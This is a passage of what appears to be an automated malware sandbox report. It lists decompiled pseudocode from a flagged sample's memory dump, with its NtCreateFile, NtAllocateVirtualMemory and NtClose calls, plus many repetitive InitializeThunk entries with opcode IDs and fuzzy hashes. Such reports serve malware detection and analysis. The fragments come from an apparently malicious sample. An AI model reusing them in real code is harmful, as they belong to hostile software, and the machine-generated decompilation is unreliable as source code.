				E00418DB0(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}





                                    0x004181bf
                                    0x004181c7
                                    0x004181fd
                                    0x00418201

                                    APIs
                                    • NtCreateFile.NTDLL(00000060,00408AE3,?,00413B87,00408AE3,FFFFFFFF,?,?,FFFFFFFF,00408AE3,00413B87,?,00408AE3,00000060,00000000,00000000), ref: 004181FD
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2208195189.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: CreateFile
                                    • String ID:
                                    • API String ID: 823142352-0
                                    • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                    • Instruction ID: 1505d2c2fac7169f29cf6ab97caa2a59105c471fc85729d0552dd22f4c6ed161
                                    • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                    • Instruction Fuzzy Hash: D7F0B6B2200208ABCB48CF89DC85DEB77ADAF8C754F158248BA0D97241C630E8518BA4
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0041838B, Relevance: 1.5, APIs: 1, Instructions: 32memorynativeCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 72%
                                    			E0041838B(signed int __ebx, intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t16;
				void* _t25;
				signed int _t29;

				_t18 = __ebx & _t29;
				asm("outsd");
				 *((intOrPtr*)(_t18 + 0x55)) =  *((intOrPtr*)((__ebx & _t29) + 0x55)) - _t18;
				_push(_t29);
				_t12 = _a4;
				_t5 = _t12 + 0xc60; // 0xca0
				E00418DB0(_t25, _a4, _t5,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t16 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t16;
			}






                                    0x0041838b
                                    0x0041838d
                                    0x0041838e
                                    0x00418390
                                    0x00418393
                                    0x0041839f
                                    0x004183a7
                                    0x004183c9
                                    0x004183cd

                                    APIs
                                    • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418F84,?,00000000,?,00003000,00000040,00000000,00000000,00408AE3), ref: 004183C9
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2208195189.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: AllocateMemoryVirtual
                                    • String ID:
                                    • API String ID: 2167126740-0
                                    • Opcode ID: 90b4b4d6a87fec0e3ee07628d04621249aeea7168c3680a55fd00696984ddb13
                                    • Instruction ID: e33716c473c1a6e546ff089dea15d4fac4e1bd4e2ae9c8d374149b142e10dc26
                                    • Opcode Fuzzy Hash: 90b4b4d6a87fec0e3ee07628d04621249aeea7168c3680a55fd00696984ddb13
                                    • Instruction Fuzzy Hash: 1BF0F2B6200208ABCB18DF99DC95EEB77A9BF88354F15815DBE1897241C630E950CBA4
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00418390, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E00418390(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
				E00418DB0(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}





                                    0x0041839f
                                    0x004183a7
                                    0x004183c9
                                    0x004183cd

                                    APIs
                                    • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418F84,?,00000000,?,00003000,00000040,00000000,00000000,00408AE3), ref: 004183C9
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2208195189.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: AllocateMemoryVirtual
                                    • String ID:
                                    • API String ID: 2167126740-0
                                    • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                    • Instruction ID: c1f36b05bbd4b7963809c3793a6f2df241a2ee7dc34c60eca979b2d1d68cf477
                                    • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                    • Instruction Fuzzy Hash: 1DF015B2200208ABCB14DF89DC81EEB77ADAF88754F118149BE0897241CA30F810CBE4
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 004182E0, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E004182E0(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x409733
				E00418DB0(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}





                                    0x004182e3
                                    0x004182e6
                                    0x004182ef
                                    0x004182f7
                                    0x00418305
                                    0x00418309

                                    APIs
                                    • NtClose.NTDLL(00413D20,?,?,00413D20,00408AE3,FFFFFFFF), ref: 00418305
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2208195189.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: Close
                                    • String ID:
                                    • API String ID: 3535843008-0
                                    • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                    • Instruction ID: 2c2b34aedc846ab3ae484734a1171ee081eb0df99b6426d3cac892bcac86a451
                                    • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                    • Instruction Fuzzy Hash: 7CD012752003146BD710EF99DC45ED7775CEF44750F154459BA185B242C930F90086E4
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00730078, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2208290057.0000000000720000.00000040.00000001.sdmp, Offset: 00710000, based on PE: true
                                    • Associated: 00000005.00000002.2208285591.0000000000710000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208376195.0000000000800000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208380533.0000000000810000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208384693.0000000000814000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208388517.0000000000817000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208392240.0000000000820000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208418416.0000000000880000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID:
                                    • API String ID: 2994545307-0
                                    • Opcode ID: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                                    • Instruction ID: 3a645d05db048e5a2937cf36c3d58d647fc753ae06e93f94360992995f7f05c0
                                    • Opcode Fuzzy Hash: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                                    • Instruction Fuzzy Hash: 2AB012B1504640C7F304F704D905B16B212FBD0F00F408938A14F86591D73DAD2CC78B
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00730048, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2208290057.0000000000720000.00000040.00000001.sdmp, Offset: 00710000, based on PE: true
                                    • Associated: 00000005.00000002.2208285591.0000000000710000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208376195.0000000000800000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208380533.0000000000810000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208384693.0000000000814000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208388517.0000000000817000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208392240.0000000000820000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208418416.0000000000880000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID:
                                    • API String ID: 2994545307-0
                                    • Opcode ID: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                                    • Instruction ID: 41e4343c146f66e2bb318e135f4e172b2897deff735033a37a94e91f6413aa4b
                                    • Opcode Fuzzy Hash: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                                    • Instruction Fuzzy Hash: DBB012B2100540C7E3099714D946B4B7210FB90F00F40C93BA11B81861DB3C993CD46A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 007300C4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2208290057.0000000000720000.00000040.00000001.sdmp, Offset: 00710000, based on PE: true
                                    • Associated: 00000005.00000002.2208285591.0000000000710000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208376195.0000000000800000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208380533.0000000000810000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208384693.0000000000814000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208388517.0000000000817000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208392240.0000000000820000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208418416.0000000000880000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID:
                                    • API String ID: 2994545307-0
                                    • Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                    • Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
                                    • Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                    • Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 007307AC, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2208290057.0000000000720000.00000040.00000001.sdmp, Offset: 00710000, based on PE: true
                                    • Associated: 00000005.00000002.2208285591.0000000000710000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208376195.0000000000800000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208380533.0000000000810000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208384693.0000000000814000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208388517.0000000000817000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208392240.0000000000820000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208418416.0000000000880000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID:
                                    • API String ID: 2994545307-0
                                    • Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                    • Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
                                    • Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                    • Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0072F900, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2208290057.0000000000720000.00000040.00000001.sdmp, Offset: 00710000, based on PE: true
                                    • Associated: 00000005.00000002.2208285591.0000000000710000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208376195.0000000000800000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208380533.0000000000810000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208384693.0000000000814000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208388517.0000000000817000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208392240.0000000000820000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208418416.0000000000880000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID:
                                    • API String ID: 2994545307-0
                                    • Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                    • Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
                                    • Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                    • Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0072F9F0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2208290057.0000000000720000.00000040.00000001.sdmp, Offset: 00710000, based on PE: true
                                    • Associated: 00000005.00000002.2208285591.0000000000710000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208376195.0000000000800000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208380533.0000000000810000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208384693.0000000000814000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208388517.0000000000817000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208392240.0000000000820000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208418416.0000000000880000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID:
                                    • API String ID: 2994545307-0
                                    • Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                    • Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
                                    • Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                    • Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0072FAE8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2208290057.0000000000720000.00000040.00000001.sdmp, Offset: 00710000, based on PE: true
                                    • Associated: 00000005.00000002.2208285591.0000000000710000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208376195.0000000000800000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208380533.0000000000810000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208384693.0000000000814000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208388517.0000000000817000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208392240.0000000000820000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208418416.0000000000880000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID:
                                    • API String ID: 2994545307-0
                                    • Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                    • Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
                                    • Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                    • Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0072FAD0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2208290057.0000000000720000.00000040.00000001.sdmp, Offset: 00710000, based on PE: true
                                    • Associated: 00000005.00000002.2208285591.0000000000710000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208376195.0000000000800000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208380533.0000000000810000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208384693.0000000000814000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208388517.0000000000817000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208392240.0000000000820000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208418416.0000000000880000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID:
                                    • API String ID: 2994545307-0
                                    • Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                    • Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
                                    • Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                    • Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0072FB68, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2208290057.0000000000720000.00000040.00000001.sdmp, Offset: 00710000, based on PE: true
                                    • Associated: 00000005.00000002.2208285591.0000000000710000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208376195.0000000000800000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208380533.0000000000810000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208384693.0000000000814000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208388517.0000000000817000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208392240.0000000000820000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208418416.0000000000880000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID:
                                    • API String ID: 2994545307-0
                                    • Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                    • Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
                                    • Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                    • Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0072FBB8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2208290057.0000000000720000.00000040.00000001.sdmp, Offset: 00710000, based on PE: true
                                    • Associated: 00000005.00000002.2208285591.0000000000710000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208376195.0000000000800000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208380533.0000000000810000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208384693.0000000000814000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208388517.0000000000817000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208392240.0000000000820000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208418416.0000000000880000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID:
                                    • API String ID: 2994545307-0
                                    • Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                    • Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
                                    • Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                    • Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0072FC60, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2208290057.0000000000720000.00000040.00000001.sdmp, Offset: 00710000, based on PE: true
                                    • Associated: 00000005.00000002.2208285591.0000000000710000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208376195.0000000000800000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208380533.0000000000810000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208384693.0000000000814000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208388517.0000000000817000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208392240.0000000000820000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208418416.0000000000880000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID:
                                    • API String ID: 2994545307-0
                                    • Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                    • Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
                                    • Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                    • Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0072FC90, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2208290057.0000000000720000.00000040.00000001.sdmp, Offset: 00710000, based on PE: true
                                    • Associated: 00000005.00000002.2208285591.0000000000710000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208376195.0000000000800000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208380533.0000000000810000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208384693.0000000000814000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208388517.0000000000817000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208392240.0000000000820000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208418416.0000000000880000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID:
                                    • API String ID: 2994545307-0
                                    • Opcode ID: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                                    • Instruction ID: 41c45e5f09b42d6e0ddb2dc3248e04f5cc5ab51982cd1fe1d329002f24c15819
                                    • Opcode Fuzzy Hash: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                                    • Instruction Fuzzy Hash: 14B01272104580C7E349AB14D90AB5BB210FB90F00F40893AE04B81850DA3C992CC546
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0072FDC0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2208290057.0000000000720000.00000040.00000001.sdmp, Offset: 00710000, based on PE: true
                                    • Associated: 00000005.00000002.2208285591.0000000000710000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208376195.0000000000800000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208380533.0000000000810000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208384693.0000000000814000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208388517.0000000000817000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208392240.0000000000820000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208418416.0000000000880000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID:
                                    • API String ID: 2994545307-0
                                    • Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                    • Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
                                    • Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                    • Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0072FD8C, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2208290057.0000000000720000.00000040.00000001.sdmp, Offset: 00710000, based on PE: true
                                    • Associated: 00000005.00000002.2208285591.0000000000710000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208376195.0000000000800000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208380533.0000000000810000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208384693.0000000000814000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208388517.0000000000817000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208392240.0000000000820000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208418416.0000000000880000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID:
                                    • API String ID: 2994545307-0
                                    • Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                    • Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
                                    • Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                    • Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0072FED0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2208290057.0000000000720000.00000040.00000001.sdmp, Offset: 00710000, based on PE: true
                                    • Associated: 00000005.00000002.2208285591.0000000000710000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208376195.0000000000800000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208380533.0000000000810000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208384693.0000000000814000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208388517.0000000000817000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208392240.0000000000820000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208418416.0000000000880000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID:
                                    • API String ID: 2994545307-0
                                    • Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                    • Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
                                    • Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                    • Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0072FEA0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2208290057.0000000000720000.00000040.00000001.sdmp, Offset: 00710000, based on PE: true
                                    • Associated: 00000005.00000002.2208285591.0000000000710000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208376195.0000000000800000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208380533.0000000000810000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208384693.0000000000814000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208388517.0000000000817000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208392240.0000000000820000.00000040.00000001.sdmp Download File
